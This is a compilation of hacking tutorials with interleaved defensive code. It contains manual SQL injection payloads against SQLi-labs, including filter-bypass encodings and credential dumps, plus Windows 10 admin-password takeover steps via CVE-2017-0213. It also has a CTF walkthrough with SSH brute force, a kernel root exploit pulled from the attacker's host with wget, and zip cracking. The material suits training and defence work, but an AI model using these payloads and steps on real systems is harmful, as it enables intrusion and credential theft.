Form Based SQL Injection Manually

In our previous article we performed form-based SQL injection using sqlmap; today we are going to perform form-based SQL injection in DHAKKAN (SQLi-labs) manually. There are many examples of login forms, such as the Facebook login, the Gmail login and other online accounts, which ask you to submit your username and password.

Let’s start!! 

LESSON 11

This lesson is very similar to lessons 1, 2, 3 and 4; if you are not familiar with those lessons, please go through them first. You will come to know how to perform SQL injection manually, step by step, in order to retrieve data from inside the database.

Lesson 11 is about POST error-based injection with a single-quote (') string. When you explore this lab in the browser you will see that it contains text fields for a username and password to log in to the web server. As we are not a genuine user we do not know the correct username and password, but as a hacker we always wish to get inside the database with the help of SQL injection. Therefore we first test whether the database is vulnerable to SQL injection or not.

Since the lesson itself is titled error-based single-quote (') string, I used a single quote (') to break the query: enter it in the username text field, then click submit.

Username: '

From the given screenshot you can see we got an error message (in blue), which means the database is vulnerable to SQL injection.

So when we break the query we get an error message; now let me explain what this error message says.

The right syntax to use near '' and password='' LIMIT 0,1'

Now we need to fix this query with the help of a # (hash) comment: after the single quote (') add a hash (#), so that the rest of the backend query is commented out and the statement becomes syntactically correct.

Username: ' #

From the screenshot you can see it shows "login attempt failed", although we have successfully fixed the blue error message.

Now whatever statement you insert between ' and # will be executed as part of the query, with a result according to it. To find out the number of columns used in the backend query we'll use the ORDER BY clause:

Username: ' order by 1 #

Username: ' order by 2 #

Username: ' order by 3 #

From the screenshot you can see I received an error at order by 3, which means only two columns are used in the backend query.

Similarly, insert a UNION SELECT query between ' and # to select both records.

Username: ' union select 1,2 #

From the screenshot you can see it shows successfully logged in; now let's retrieve data from inside the database.

The next query fetches the database name, just as in lesson 1; from the screenshot you can read the database name "security".

Username: ' union select 1,database() #

Through the query below we will be able to fetch the table names present inside the database.

Username: ' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #

From screenshot you can read the following table names:

T1: emails

T2: referers

T3: uagents

T4: users

Now we'll try to find out the column names of the users table using the following query:

Username: ' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #

There are many columns, but we are interested in username and password only.

At last, execute the following query to read all usernames and passwords inside the users table.

Username: ' union select group_concat(username),group_concat(password) from users #

Hence you can see we have retrieved not just a single user's credentials but the credentials of every user; now use them to log in.

This is all about single-quote string error-based injection in lesson 11.

LESSON 12

In some scenarios you will try a single-quote string to test for SQL vulnerability, or go further and try to break the query even after knowing that the database is vulnerable, but you will not be able to break the query and receive an error message, because the developer might have blacklisted the single quote (') in the backend query.

Lesson 12 is similar to lesson 11, but here you will fail if you use a single quote to break the query, since the chapter is titled POST error-based double-quote string ("). Thus I used a double quote (") to break the query: enter it in the username text field, then click submit.

username: "

From the given screenshot you can see we got an error message (in blue), which means the database is vulnerable to SQL injection.

So when we break the query we get an error message; now let me explain what this error message says.

The right syntax to use near '""") and password=("") LIMIT 0,1'

Now we need to fix this query with the help of a closing parenthesis ) and a # (hash) comment: after the double quote (") add the closing parenthesis and then the hash (#) to make it syntactically correct.

username: ") #

From the screenshot you can see it shows "login attempt failed", although we have successfully fixed the blue error message.

Now whatever statement you insert between ") and # will be executed as part of the query, with a result according to it. To find out the number of columns used in the backend query we'll use the ORDER BY clause:

username: ") order by 3 #

From the screenshot you can see I received an error at order by 3, which means only two columns are used in the backend query.

Similarly, insert a UNION SELECT query between ") and # to select both records.

Username: ") union select 1,2 #

From the screenshot you can see it shows successfully logged in; let's now retrieve data from inside the database.

The next query fetches the database name, just as in lesson 1; from the screenshot you can read the database name "security".

Username: ") union select 1,database() #

Through the query below we will be able to fetch the table names present inside the database.

Username: ") union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #

From screenshot you can read the following table names:

T1: emails

T2: referers

T3: uagents

T4: users

Now we'll try to find out the column names of the users table using the following query:

Username: ") union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #

There are many columns, but we are interested in username and password only.

At last, execute the following query to read all usernames and passwords inside the users table.

Username: ") union select group_concat(username),group_concat(password) from users #

Hence you can see we have retrieved not just a single user's credentials but the credentials of every user; now use them to log in.

This is all about double-quote string error-based injection in lesson 12.
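To see why the login forms in lessons 11 and 12 fall over, here is an added example (not code from the article or from the SQLi-labs project) that builds the same kind of login query two ways: by splicing the username into the SQL text, as the lab does, and with bound parameters. It uses Python's bundled sqlite3 against a constructed users table; SQLite accepts `--` but not `#` as a comment, so the union payload from lesson 11 is written with `--`. The same fix applies to the double-quote-and-parenthesis variant of lesson 12, since the driver never lets the value touch the SQL grammar. Function and table contents are my own.

```python
import sqlite3

# Constructed stand-in for the lab's "users" table (two made-up accounts).
# Passwords are stored in clear text only because the lab's table is; a real
# application stores password hashes and verifies them in code, not in SQL.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("alice", "wonderland"), ("bob", "builder")],
    )
    return conn

def login_vulnerable(conn, username, password):
    """The lab's pattern: user input is spliced into the SQL text, so a quote
    in the username ends the string literal and the rest is parsed as SQL."""
    sql = ("SELECT username, password FROM users "
           f"WHERE username='{username}' AND password='{password}' LIMIT 1")
    return conn.execute(sql).fetchone()

def login_parameterized(conn, username, password):
    """Bound parameters: the values travel separately from the SQL text, so
    quotes, comment tokens and UNION inside them are just characters to compare."""
    sql = "SELECT username, password FROM users WHERE username=? AND password=? LIMIT 1"
    return conn.execute(sql, (username, password)).fetchone()

# Lesson 11's union payload, with SQLite's comment token in place of MySQL's '#'.
UNION_PAYLOAD = "' union select 1,2 -- "

if __name__ == "__main__":
    db = make_db()
    print("legit, vulnerable     :", login_vulnerable(db, "alice", "wonderland"))
    print("legit, parameterized  :", login_parameterized(db, "alice", "wonderland"))
    print("payload, vulnerable   :", login_vulnerable(db, UNION_PAYLOAD, "x"))     # (1, 2): "logged in"
    print("payload, parameterized:", login_parameterized(db, UNION_PAYLOAD, "x"))  # None
```

The vulnerable function returns the row (1, 2) for the payload, which is the "successfully logged in" the article observes; the parameterized version returns nothing because it looks for a user literally named `' union select 1,2 -- `. The ORDER BY and information_schema probes from the lesson fail against the second function for the same reason.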

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets.

Bypass Admin access through guest Account in windows 10

Open a command prompt and check the Windows user account status using the "whoami" command.

The account name is "joe" and the account status is 'DefaultAccount', which is a non-administrator account type.

Try changing the administrator account using the 'net user' command. You will see the error 'Access is denied'.

Now download "CVE-2017-0213_x64" from here and unzip it on your PC. Go to the folder, where you will find the .exe file, and double-click it to run it.

The moment you double-click it, it automatically opens a new command prompt with administrator privileges.

Use the 'net user' command to change the administrator account's password. The message 'The command completed successfully' will appear; you have now successfully changed the administrator account's password.

Author: Abhimanyu Dev is an Aspiring Cyber Security Expert.

Hack the Super Mario (CTF Challenge)

Hello friends!! You may have played THE SUPER MARIO game once in your childhood, and no wonder if the thought of hacking the game has struck your mind. So whatever you had thought, today we are going to make it true, and for that you need to download the new Super Mario VM from here.

The credit for developing this VM goes to Mr_h4sh, who has hidden 2 flags inside this lab as a challenge for hackers. The level of the challenge is Intermediate.

Let’s breach!!!

As you know, we always start with enumeration; therefore open a terminal in your Kali Linux and run an aggressive scan with nmap.

nmap -p- -A 192.168.0.5

Since port 22 and port 8180 are open for the SSH and HTTP services respectively, I chose port 8180 for enumeration, but from the screenshot you can see I didn't get any remarkable result.

dirb http://192.168.0.5:8180

Then I moved on to a directory brute-force attack using the following command:

dirb http://192.168.0.5:8180 /usr/share/wordlists/dirb/big.txt

In the screenshot below you can see it found a file named vhosts; let's explore it through the browser.

Now open vhosts in the URL http://192.168.0.5:8180/vhosts. Here vhosts stands for virtual hosts, a method for hosting multiple domains on a single server. From inside vhosts I came to know that the server name is mario.supermariohost.local.

Let's add mario.supermariohost.local to /etc/hosts as a new local host entry.

cd /etc

vim hosts

Now type "192.168.0.5 mario.supermariohost.local" inside the vim editor to add it to /etc/hosts, then type :wq to save it.

Now type cat hosts to check the added host name; from the screenshot you can see it has been added successfully.

Then I visited mario.supermariohost.local in the browser and finally got Mario as a browser game, but it is not working.

Since we know ports 22 and 8180 were open and we didn't get much information from enumerating port 8180, we will now move towards port 22 for SSH enumeration. Therefore I prepared a dictionary in order to retrieve credentials to log in to the SSH server.

The dictionary contains usernames that are famous MARIO characters; you can check these names on Google as well.

In a text editor type the following names: mario; luigi; peach; toad; yoshi, and save the file as user on the desktop.

Use John the Ripper to generate a password dictionary with the following command: --rules applies John's wordlist mangling rules to each name, and --stdout writes the generated candidates to standard output, which is redirected into a file named pass on the desktop.

john --wordlist=user --rules --stdout > pass

Finally we have a username dictionary as user and a password dictionary generated by John as pass; now we have to find the matching combination of user and pass in order to retrieve credentials for SSH login. I chose hydra for password cracking; you can choose any other password-cracking tool as well.

hydra -L user -P pass 192.168.0.5 ssh

From the given screenshot you can read the matched combination for the SSH server: username luigi and password luigi1.

Now type the following for SSH login:

ssh luigi@192.168.0.5

Password: luigi1

Yeeppiii!!!! Finally we have logged in to the SSH server.
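On the server side, the hydra run above shows up in sshd's log as a burst of "Failed password" lines from one address, often followed by an "Accepted" line for the account that matched. The following added example (not code from the article or from the VM) parses a few constructed auth.log lines in syslog format (hostname, PIDs, ports and times are made up; the usernames are the ones from the page's dictionary; the year, which syslog omits, is an assumed parameter) and flags any source that exceeds a failure threshold inside a sliding time window, reporting whether a login was accepted afterwards.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sshd lines in syslog format for this example.
SAMPLE_AUTH_LOG = """\
Oct 10 13:55:36 supermariohost sshd[2101]: Failed password for mario from 192.168.0.6 port 51522 ssh2
Oct 10 13:55:37 supermariohost sshd[2103]: Failed password for invalid user peach from 192.168.0.6 port 51524 ssh2
Oct 10 13:55:37 supermariohost sshd[2105]: Failed password for invalid user toad from 192.168.0.6 port 51526 ssh2
Oct 10 13:55:38 supermariohost sshd[2107]: Failed password for luigi from 192.168.0.6 port 51528 ssh2
Oct 10 13:55:38 supermariohost sshd[2109]: Failed password for invalid user yoshi from 192.168.0.6 port 51530 ssh2
Oct 10 13:55:39 supermariohost sshd[2111]: Accepted password for luigi from 192.168.0.6 port 51532 ssh2
Oct 10 14:10:02 supermariohost sshd[2250]: Failed password for luigi from 192.168.0.20 port 40012 ssh2
Oct 10 14:30:45 supermariohost sshd[2300]: Accepted publickey for luigi from 192.168.0.20 port 40020 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) (?:password|publickey) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+"
)

def parse(line, year=2017):
    """Return (timestamp, 'Accepted'|'Failed', user, ip) or None for other lines.
    The year is assumed because the syslog timestamp does not carry one."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["user"], m["ip"]

def find_bruteforce(log_text, threshold=5, window=timedelta(minutes=5)):
    """Map source ip -> {'failures', 'users', 'accepted_after'} for every source
    that produced at least `threshold` failures inside any `window`-long span."""
    events = [e for e in map(parse, log_text.splitlines()) if e]
    by_ip = defaultdict(list)
    for ts, result, user, ip in events:
        by_ip[ip].append((ts, result, user))
    alerts = {}
    for ip, evs in by_ip.items():
        evs.sort()
        fails = [(ts, user) for ts, r, user in evs if r == "Failed"]
        start = 0
        for end in range(len(fails)):
            # slide the window start forward until it spans at most `window`
            while fails[end][0] - fails[start][0] > window:
                start += 1
            if end - start + 1 >= threshold:
                first_fail = fails[start][0]
                users = sorted({u for _, u in fails[start:end + 1]})
                # a success from the same source after the burst began is the
                # "password found" moment and deserves the loudest alert
                accepted = next((u for ts, r, u in evs if r == "Accepted" and ts >= first_fail), None)
                alerts[ip] = {"failures": end - start + 1, "users": users, "accepted_after": accepted}
                break
    return alerts

if __name__ == "__main__":
    for ip, info in find_bruteforce(SAMPLE_AUTH_LOG).items():
        print(ip, info)
```

Five distinct usernames from one address in two seconds, followed by an accepted password, is the signature the dictionary attack above leaves; the single failure from 192.168.0.20 stays below the threshold. Tune the threshold and window to the host's normal traffic.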

uname -a

Here we come to know that the Linux kernel version on supermariohost is 3.13.0; let's look for an exploit for it on Google.

Yes, there is an exploit for 3.13.0: overlayfs local root in Ubuntu. Download it from here inside your Kali Linux.

From the screenshot you can see I have saved the exploit as mario.c for privilege escalation.

Now type the following command to download mario.c onto the target system:

wget http://192.168.0.6/mario.c

The file was successfully downloaded; now type the following commands to compile and run mario.c:

gcc mario.c -o mario

./mario

id

cd /root

ls

Awesome!!! We have got root privileges, and from the screenshot you can see that inside its directory I found a zip file, flag.zip.

Now type the following command to copy flag.zip to the desktop of your Kali Linux:

scp /root/flag.zip root@192.168.0.6:/root/Desktop

fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt flag.zip

As shown in the screenshot, PASSWORD FOUND!!!: pw == ilovepeach; now you can unzip the file using this password.

unzip flag.zip

It will ask for a password; give the password above to unzip it, and if you look at the image again you will notice it contains flag.txt.

cat flag.txt

1st FLAG: Well done :D If you reached this it means you got root, congratulations.

Now follow the steps below in order to complete the other challenge.

iptables -L

Here from the screenshot you can see that a new network has been added on the remote system.

arp -n

Now the target system has been forwarded to a new IP, 192.168.122.112.

ls -la

Found a directory named .bak.

cd /.bak

ls

cd users

cd luigi

ls

There are two files inside it; let's read them one by one.

cat message

Hi Luigi,

Since you’ve been messing around with my host, at this point I want to return the favour. This is a “war”, you “naughty” boy!

cat id_rsa.pub

The highlighted word in the given text looks like a username for logging in to the SSH server.

Let's make sure by logging in with: ssh -i id_rsa warluigi@192.168.122.112

Great!! Our assumption gave a positive result.

Again check the kernel version:

uname -a

Woooww!! It is the same version, so now we can use our mario.c exploit for root privileges. Hence repeat the steps above as shown in the images.

wget http://192.168.0.6/mario.c

The file was successfully downloaded; now type the following commands to compile and run mario.c:

gcc mario.c -o mario

./mario

id

cd /root

ls -la

Here I found two important files, hint.txt and flag2.zip; before unzipping flag2.zip we should look at the hint.txt file.

cat .hint.txt

"Peach Loves Me" might be the password for decrypting the flag2.zip file.

Now let's copy flag2.zip to the desktop of Kali Linux by using the following command again:

scp /root/flag2.zip root@192.168.0.6:/root/Desktop

unzip flag2.zip

Now when it asks for the password, type "Peach Loves Me".

It contains flag2.txt; type cat flag2.txt to open this file.

2nd FLAG: Congratulations on your second flag!

Wonderful!!! We have caught both flags.

Author: Rajat Chikara is an Ethical Hacker, Cyber Security Expert and Penetration Tester, India.

How to Bypass SQL Injection Filter Manually

In the previous article you learned the basic concepts of SQL injection, but in some scenarios you will find that your basic knowledge and tricks fail. The reason is the protection the developer has applied to prevent SQL injection: sometimes a developer uses filters to strip out certain characters and OPERATORS from the user input before adding it to the SQL statement. Today's article will help you face such situations and will show you how to bypass such filters. Here again we'll be using the DHAKKAN SQLi labs for practice.

 Let’s start!!

LESSON 25

In lab 25 the OR and AND operators are blocked; here we will try to bypass the SQL filter using their substitutes.

function blacklist($id)
{
    $id = preg_replace('/or/i', "", $id);     // strip out OR (case-insensitive)
    $id = preg_replace('/AND/i', "", $id);    // strip out AND (case-insensitive)
    return $id;
}

Since the alphabetic words OR and AND are blacklisted, if we use AND 1=1 or OR 1=1 there will be no output; therefore I used %26%26 inside the query.

The following are replacements for AND and OR:

AND: && (URL-encoded as %26%26)

OR: ||

Open the browser and type the following SQL query in the URL:

http://localhost:81/sqli/Less-25/?id=1' %26%26 1=1 --+

From the screenshot you can see we have successfully fixed the query by URL-encoding AND (&&) as %26%26, even though the AND operator was filtered out.

Once the concept of bypassing the AND filter is clear, we next need to alter the SQL statement to retrieve database information.

http://localhost:81/sqli/Less-25/?id=-1' union select 1,2,3 %26%26 1=1 --+

Type the following query to retrieve the database name using union injection:

http://localhost:81/sqli/Less-25/?id=-1' union select 1,database(),3 %26%26 1=1 --+

Hence you can see we have successfully got security as the database name in the result.

The next query will provide all table names saved inside the database.

http://localhost:81/sqli/Less-25/?id=-1' union select 1,group_concat(table_name),3 from infoorrmation_schema.tables where table_schema=database() %26%26 1=1 --+

From screenshot you can read the following table names:

T1: emails

T2: referers

T3: uagents

T4: users

Now we'll try to find out the column names of the users table using the following query.

http://localhost:81/sqli/Less-25/?id=-1' union select 1,group_concat(column_name),3 from infoorrmation_schema.columns where table_name='users' %26%26 1=1 --+

Hence you can see it contains 4 columns inside it.

C1: id

C2: username

C3: password

At last, execute the following query to read all usernames inside the users table from its username column.

http://localhost:81/sqli/Less-25/?id=-1' union select 1,group_concat(username),3 from users --+

From screenshot you can read the fetched data.

Hence in lesson 25 we have learned how to bypass the AND and OR filters for retrieving information from the database.
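As an added illustration (not code from the article or from SQLi-labs), here is the Less-25 blacklist re-implemented in Python next to the control a defender would use instead. The blacklist makes a single deletion pass, so it both corrupts legitimate input that happens to contain "or" or "and" and lets a doubled spelling collapse into the banned word, which is exactly why the queries above spell information_schema as infoorrmation_schema. An allowlist that accepts only digits for an integer id (or, better still, a parameterized query) needs no list of bad words at all. Function names and sample values are mine.

```python
import re

def blacklist_less25(value: str) -> str:
    """Python equivalent of the lab's blacklist($id): one case-insensitive
    deletion pass for 'or', then one for 'and'. The result is never re-checked."""
    value = re.sub(r"or", "", value, flags=re.IGNORECASE)
    value = re.sub(r"and", "", value, flags=re.IGNORECASE)
    return value

def validate_id(raw: str) -> int:
    """Allowlist for an integer id parameter: only 1 to 10 ASCII digits pass;
    anything else is rejected before it reaches any SQL."""
    if not re.fullmatch(r"[0-9]{1,10}", raw):
        raise ValueError(f"rejected id parameter: {raw!r}")
    return int(raw)

def is_accepted(raw: str) -> bool:
    """True when validate_id() would accept the value."""
    try:
        validate_id(raw)
        return True
    except ValueError:
        return False

if __name__ == "__main__":
    # 1. Legitimate data is silently damaged by the blacklist.
    print(blacklist_less25("Gordon Sanders"))          # Gdon Sers
    # 2. A doubled spelling survives the single pass as the banned word.
    print(blacklist_less25("infoorrmation_schema"))    # information_schema
    # 3. The operator the page substitutes is not in the list at all.
    print(blacklist_less25("1' && 1=1 --"))            # unchanged
    # 4. The allowlist accepts a real id and rejects everything else.
    print(validate_id("1"), is_accepted("1' && 1=1 --"))  # 1 False
```

Because the id in these labs is numeric, the allowlist is the whole fix for lessons 25 to 27: no spelling of UNION, no alternative whitespace and no comment token can get past a check that only admits digits. Where a parameter is free text, bind it with a parameterized query rather than trying to enumerate bad words.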

LESSON 26

You will find lab 26 more challenging because here spaces, comments, OR and AND are blocked, so now we will try to bypass the SQL filter using their substitutes.

The following is the function blacklist($id):

function blacklist($id)
{
    $id = preg_replace('/or/i', "", $id);          // strip out OR (case-insensitive)
    $id = preg_replace('/and/i', "", $id);         // strip out AND (case-insensitive)
    $id = preg_replace('/[\/\*]/', "", $id);       // strip out /*
    $id = preg_replace('/[--]/', "", $id);         // strip out --
    $id = preg_replace('/[#]/', "", $id);          // strip out #
    $id = preg_replace('/[\s]/', "", $id);         // strip out spaces
    $id = preg_replace('/[\/\\\\]/', "", $id);     // strip out slashes
    return $id;
}

This lab has more filters compared to lab 25, because here spaces and comments are also blocked. Now execute the following query in the URL:

http://localhost:81/sqli/Less-26/?id=1'%a0%26%26'1=1

From the screenshot you can see we have successfully fixed the query by replacing the SPACE with the URL-encoded %a0.

Blanks that can substitute for a space: %09, %0A, %0B, %0C, %0D, %a0

Once the concept of bypassing the AND, OR and SPACE filters is clear, we next need to alter the SQL statement to retrieve database information.

http://localhost:81/sqli/Less-26/?id=0'%a0union%a0select%a01,2,3%a0%26%26'1=1

Type the following query to retrieve the database name using union injection.

http://localhost:81/sqli/Less-26/?id=0'%a0union%a0select%a01,database(),3%a0%26%26'1=1

Hence you can see we have successfully got security as the database name in the result.

The next query will provide all table names saved inside the database.

http://localhost:81/sqli/Less-26/?id=0'%a0union%a0select%a01,group_concat(table_name),3%a0from%a0infoorrmation_schema.tables%a0where%a0table_schema=database()%a0%26%26'1=1

From screenshot you can read the following table names:

T1: emails

T2: referers

T3: uagents

T4: users

Now we'll try to find out the column names of the users table using the following query.

http://localhost:81/sqli/Less-26/?id=0'%a0union%a0select%a01,group_concat(column_name),3%a0from%a0infoorrmation_schema.columns%a0where%a0table_name='users'%a0%26%26'1=1

Hence you can see the columns inside it:

C1: id

C2: username

C3: password

At last, execute the following query to read all usernames inside the users table from its username column.

http://localhost:81/sqli/Less-26/?id=0'%a0union%a0select%a01,group_concat(username),3%a0from%a0users%a0where%a01%26%26%a0'1

From the screenshot you can read the fetched data.

Hence in lesson 26 we have learned how to bypass the AND, OR, SPACE and COMMENT filters for retrieving information from the database.

LESSON 27

You will find this lab even more challenging because here UNION/union, SELECT/select, SPACE and comments are blocked, so now we will try to bypass the SQL filter using their substitutes.

The following is the function blacklist($id):

function blacklist($id)
{
    $id = preg_replace('/[\/\*]/', "", $id);     // strip out /*
    $id = preg_replace('/[--]/', "", $id);       // strip out --
    $id = preg_replace('/[#]/', "", $id);        // strip out #
    $id = preg_replace('/[ +]/', "", $id);       // strip out spaces and plus signs
    $id = preg_replace('/select/m', "", $id);    // strip out select (multi-line modifier)
    $id = preg_replace('/[ +]/', "", $id);       // strip out spaces and plus signs (again)
    $id = preg_replace('/union/s', "", $id);     // strip out union
    $id = preg_replace('/select/s', "", $id);    // strip out select
    $id = preg_replace('/UNION/s', "", $id);     // strip out UNION
    $id = preg_replace('/SELECT/s', "", $id);    // strip out SELECT
    $id = preg_replace('/Union/s', "", $id);     // strip out Union
    $id = preg_replace('/Select/s', "", $id);    // strip out Select
    return $id;
}

This lab has more filters in addition to lab 26, because here union, select, spaces and comments are also blocked; note that each spelling is matched case-sensitively, so mixed-case spellings are not covered. Now execute the following query in the URL:

http://localhost:81/sqli/Less-27/?id=1' AND'1=1

Once the concept of bypassing the UNION/union, SELECT/select and SPACE filters is clear, we next need to alter the SQL statement to retrieve database information.

http://localhost:81/sqli/Less-27/?id=1'%a0UnIon%a0SeLect%a01,2,3%a0AND'1=1

In the screenshot you can see I have written union as UnIon and select as SeLect in the query to bypass the filter.

Now type the following query to retrieve the database name using union injection.

http://localhost:81/sqli/Less-27/?id=0'%a0UnIon%a0SeLect%a01,database(),3%a0AND'1=1

Hence you can see we have successfully got security as the database name in the result.

The next query will provide all table names saved inside the database.

http://localhost:81/sqli/Less-27/?id=0'%a0UnIon%a0SeLect%a01,group_concat(table_name),3%a0from%a0information_schema.tables%a0where%a0table_schema=database()%a0AND'1=1

From screenshot you can read the following table names:

T1: emails

T2: referers

T3: uagents

T4: users

Now we'll try to find out the column names of the users table using the following query.

http://localhost:81/sqli/Less-27/?id=0'%a0UnIon%a0SeLect%a01,group_concat(column_name),3%a0from%a0information_schema.columns%a0where%a0table_name='users'%a0AND'1=1

Hence you can see the columns inside it:

C1: id

C2: username

C3: password

At last, execute the following query to read all usernames inside the users table from its username column.

http://localhost:81/sqli/Less-27/?id=0'%a0UnIon%a0SeLect%a01,group_concat(username),3%a0from%a0users%a0AND'1=1

From the screenshot you can read the fetched data.

Hence in lesson 27 we have learned how to bypass the UNION/union, SELECT/select, SPACE and COMMENT filters for retrieving information from the database.
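From the defender's side, the union queries in lessons 25 to 27 leave a clear trace in the web server's access log, but only if the detection decodes the request the way the application does: URL-decoded, case-folded, and with %a0 and the other blanks listed above normalised to a single space. The following added example (not code from the article) runs that normalisation plus a handful of indicator patterns over a few constructed combined-log lines whose query strings mirror this page's URLs; the client address, timestamps and byte counts are made up, and the indicator names are mine.

```python
import re
from urllib.parse import unquote_plus

# Constructed combined-log lines for this example (lines 3 to 5 carry the
# lesson 25, 26 and 27 payloads as a browser would send them).
SAMPLE_LOG = """\
192.168.0.10 - - [10/Oct/2017:13:55:36 +0000] "GET /sqli/Less-25/?id=1 HTTP/1.1" 200 1043
192.168.0.10 - - [10/Oct/2017:13:55:40 +0000] "GET /index.html HTTP/1.1" 200 512
192.168.0.10 - - [10/Oct/2017:13:56:02 +0000] "GET /sqli/Less-25/?id=1'%20%26%26%201=1%20--+ HTTP/1.1" 200 1043
192.168.0.10 - - [10/Oct/2017:13:57:15 +0000] "GET /sqli/Less-26/?id=0'%a0union%a0select%a01,database(),3%a0%26%26'1=1 HTTP/1.1" 200 1101
192.168.0.10 - - [10/Oct/2017:13:58:41 +0000] "GET /sqli/Less-27/?id=0'%a0UnIon%a0SeLect%a01,2,3%a0AND'1=1 HTTP/1.1" 200 1101
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Indicators are matched against the normalised query string, so mixed case,
# %a0 blanks and %26%26 all look the same as their plain forms here.
INDICATORS = {
    "union select":   re.compile(r"\bunion\s+(all\s+)?select\b"),
    "schema probe":   re.compile(r"_schema\.(tables|columns)\b"),
    "logic operator": re.compile(r"&&|\|\||\band\s*'|\bor\s*'"),
    "tautology":      re.compile(r"\b(\d+)\s*=\s*\1\b"),
    "sql comment":    re.compile(r"--\s|--$|#|/\*"),
}

def normalize_query(target: str) -> str:
    """Decode the query string like PHP does ('+' and %xx), then fold every
    Unicode blank (including %a0 / NBSP) to one space and lower-case it."""
    query = target.partition("?")[2]
    decoded = unquote_plus(query, encoding="latin-1")
    return re.sub(r"\s+", " ", decoded).lower()

def classify(line: str):
    """Names of the indicators that fire on one log line (empty list if none)."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    q = normalize_query(m.group("target"))
    return [name for name, rx in INDICATORS.items() if rx.search(q)]

def flag_lines(log_text: str):
    """(line number, indicators) for every line that trips at least one indicator."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        found = classify(line)
        if found:
            hits.append((n, found))
    return hits

if __name__ == "__main__":
    for n, found in flag_lines(SAMPLE_LOG):
        print(f"line {n}: {', '.join(found)}")
```

The two benign lines pass, and each of the three lab requests trips at least two indicators. Decoding with latin-1 keeps %a0 as a single NBSP character, which Python's `\s` treats as whitespace; decoding as UTF-8 would turn it into a replacement character and the union keyword split would go unnoticed. POST bodies such as the lesson 11 and 12 forms are not in the access log, so the same normalisation has to be applied where the body is visible (application logging or a WAF).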

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets.
